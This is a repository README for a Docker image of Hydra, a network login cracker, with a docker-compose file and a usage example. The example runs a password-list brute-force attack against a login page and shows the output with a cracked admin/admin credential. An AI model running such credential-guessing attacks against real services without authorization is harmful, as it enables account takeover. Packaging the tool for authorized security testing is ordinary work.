dockerfiles/hydra
kev 311598aae6 fix hydra 2019-06-09 09:24:19 +08:00
..
arm fix hydra 2019-06-09 09:24:19 +08:00
Dockerfile update hydra 2019-06-09 08:50:43 +08:00
README.md update hydra 2019-06-09 08:50:43 +08:00
docker-compose.yml fix hydra 2019-06-09 09:24:19 +08:00

hydra

A very fast network logon cracker which support many different services.

  • openssl
  • idn
  • curses
  • pcre
  • Postgres
  • SVN
  • firebird
  • MYSQL client
  • AFP
  • NCP
  • SAP/R3
  • libssh
  • Oracle
  • GUI req's
  • Android specialities
  • secure compile option support in gcc

docker-compose.yml

hydra:
  image: vimagick/hydra
  command: sleep infinity
  volumes:
    - ./data:/data
  working_dir: /data
  restart: unless-stopped

up and running

$ docker-compose up -d

$ docker-compose exec hydra bash

>>> cat passwd.txt
    123456
    admin
    ...

>>> hydra -l admin -P passwd.txt -o hacked.txt http://www.target.com/login.php
    [DATA] max 1 task per 1 server, overall 64 tasks, 3 login try (l:1/p:1), ~0 tries per task
    [DATA] attacking service http-get on port 2812
    [2812][http-get] host: ss.easypi.info   login: admin   password: admin
    1 of 1 target successfully completed, 1 valid password found

>>> cat hacked.txt
    [2812][http-get] host: ss.easypi.info   login: admin   password: admin